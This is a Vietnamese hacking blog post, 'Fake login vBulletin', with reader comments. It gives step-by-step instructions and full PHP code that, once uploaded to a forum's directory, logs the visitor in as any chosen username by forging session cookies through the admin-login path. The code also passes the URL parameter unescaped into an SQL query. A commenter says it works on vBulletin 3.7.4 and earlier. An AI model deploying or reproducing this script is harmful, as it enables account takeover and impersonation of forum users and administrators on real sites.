Home > HACKING - SECURITY > Fake login vBulletin

Fake login vBulletin

Ta có thể login vào forum vbb với 1 nick bất kỳ bằng cách sau :

– Save đoạn code dưới dưới dạng file xxx.php, upload lên hosting.

– Chạy đường dẫn http://domain.com/forum/xxx.php?bd=username

Bùm … truy cập lại link http://domain.com/forum/index.php đã đăng nhập với nick username smile_regular

CODE :

<?php
if (isset($_GET[‘bd’]))
{
define(‘THIS_SCRIPT’, ‘login’);
require_once(‘./global.php’);
require_once(‘./includes/functions_login.php’);
$vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = ‘" . $_GET[‘bd’] . "’");
if (!$vbulletin->userinfo[‘userid’]) die("Invalid username!");
else
{
vbsetcookie(‘userid’, $vbulletin->userinfo[‘userid’], true, true, true);
vbsetcookie(‘password’, md5($vbulletin->userinfo[‘password’] . COOKIE_SALT), true, true, true);
exec_unstrike_user($_GET[‘bd’]);
process_new_login(‘cplogin’, TRUE, TRUE);
do_login_redirect();
}
}

?>

DEMO :

picture078

picture077

Advertisements
Categories: HACKING - SECURITY
  1. Đại Dương
    March 1, 2009 at 12:28 am

    Không đc, có nói phiên bản nào không

  2. DAO
    March 2, 2009 at 11:29 am

    @Đại Dương : Lỗi này thực hiện được với các forum vBulletin từ version 3.7.4 về trước, bản VBB 3.81 đã khắc phục.

  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: